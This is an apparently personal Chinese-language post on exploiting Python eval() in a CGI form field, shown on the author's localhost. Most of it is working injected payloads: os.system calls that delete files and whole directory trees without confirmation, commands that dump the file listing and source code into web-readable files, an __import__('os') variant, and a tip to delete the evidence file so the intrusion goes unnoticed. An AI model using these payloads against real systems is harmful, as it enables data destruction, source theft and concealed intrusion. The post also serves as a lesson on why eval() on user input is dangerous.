一般來說Python的eval()函數(shù)可以把字符串“123”變成數(shù)字類型的123，但是PP3E上說它很危險，還可以執(zhí)行其他命令！

對此進行一些試驗。果然，如果python寫的cgi程序中如果使用eval()而非int()來轉(zhuǎn)換諸如年齡這樣的輸入框中的內(nèi)容時是非常危險的。不僅可以看見列出系統(tǒng)的全部文件，還可以執(zhí)行刪除文件，察看文件源代碼等危險操作！

試著寫了個程序，想把本地的腳本文件同過這樣的形式一行一行的寫到服務器的某個文件里，可最后失敗在無法輸入換行符"/n"，在提交的語句里只要有換行符，就會出現(xiàn)EOL的出錯提示，換了編碼方式還是沒能成功。
 
網(wǎng)頁里有一個提交名字的窗口，這里只是以改它為例，否則名字是不會用eval函數(shù)轉(zhuǎn)換的，不過年齡到是很容易出問題。這個文件（http://localhost/tutor4.html）導入了os。

line1 = "Hello, %s." % eval(form['user'].value)

（1）

os.system('del * /q') #刪除當前目錄下所有文件（不包括文件夾）。

os.system調(diào)用當前系統(tǒng)的命令（如windows）

/q
指定強制狀態(tài)。不提示您確認刪除。

（2）若刪除文件夾，使用rmdir

/s
刪除指定目錄和所有子目錄以及包含的所有文件。使用 /s 來刪除目錄樹。

/q
在安靜模式中運行 rmdir。不經(jīng)確認即刪除目錄。

os.system('rmdir d:/workspace /s/q')

（3）列出所有文件os.system('dir')。因為成功執(zhí)行了dir命令后，系統(tǒng)返回0，所以看到的返回內(nèi)容只能是Hello,0.而在服務器上，倒是真的列出來了，如果有日志，可能被發(fā)現(xiàn)。提交os.system('dir >dir.txt')，那么訪問http://localhost/dir.txt那么所有的文件和文件夾都暴露了，想看源代碼嗎？如果再使用os.system('type target.py').命令如果成功完成同樣會返回Hello, 0.的。難道再放進一個文件，再訪問那個文件嗎？open('target.py').read()

由此，可以在列出和察看其他文件夾里面的內(nèi)容了。

如果沒干別的壞事，那么可刪除dir.txt以免被人發(fā)現(xiàn)了。os.system('del dir.txt /q')

導入os并執(zhí)行命令：

__import__('os').system('dir >dir.txt')